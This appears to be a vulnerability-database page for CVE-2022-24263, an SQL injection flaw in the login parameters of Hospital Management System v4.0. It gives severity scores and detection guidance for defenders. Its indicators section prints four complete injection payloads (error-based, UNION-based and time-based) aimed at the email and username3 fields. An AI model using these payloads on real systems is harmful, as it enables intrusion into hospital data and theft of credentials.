cbcvebase.
CVE-2022-24263
published 2022-01-31

CVE-2022-24263: Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/func.php via the email parameter.

PriorityP261critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
8.24%
94.2th percentile
Hospital Management System v4.0 was discovered to contain a SQL injection vulnerability in /Hospital-Management-System-master/func.php via the email parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
phpgurukulhospital_management_system

Detection & IOCsextracted from sources · hover to see the quote

path/Hospital-Management-System-master/func.php
commandemail=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936) OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN 1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login
commandemail=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730) UNION ALL SELECT 8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login
commandusername3=CHnDaCTc'+(select-2423) OR 1 GROUP BY CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0 END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login
commandusername3=CHnDaCTc'+(select-3282) UNION ALL SELECT CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login
  • Monitor POST requests to func.php, function.php, contact.php, and func3.php for SQL injection patterns including SLEEP(), UNION ALL SELECT, and FLOOR(RAND()) error-based payloads in the email, txtName, txtPhone, and username3 parameters.
  • Detect time-based blind SQLi via SLEEP() calls in POST body parameters (e.g., txtName, email); alert on SLEEP values >= 3 seconds originating from these endpoints.
  • Detect error-based SQLi using FLOOR(RAND()*2) GROUP BY CONCAT pattern in POST parameters targeting the email and username3 fields on login endpoints (patsub=Login, docsub1=Login).
  • Look for the hex-encoded canary strings 0x7162706271 and 0x716b767a71 (decoding to 'qbpbq' and 'qkvzq') in HTTP responses, which are SQLi UNION/error-based confirmation markers used by the attacker.
  • ·The vulnerable application is Hospital Management System v4.0 only; the affected files are func.php, function.php, contact.php, and func3.php. Detection rules should be scoped to these specific paths to avoid false positives on other PHP applications.
  • ·The exploit targets POST parameters (email, txtName, txtPhone, username3); WAF or IDS rules should inspect POST body content, not just URL query strings, for these endpoints.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.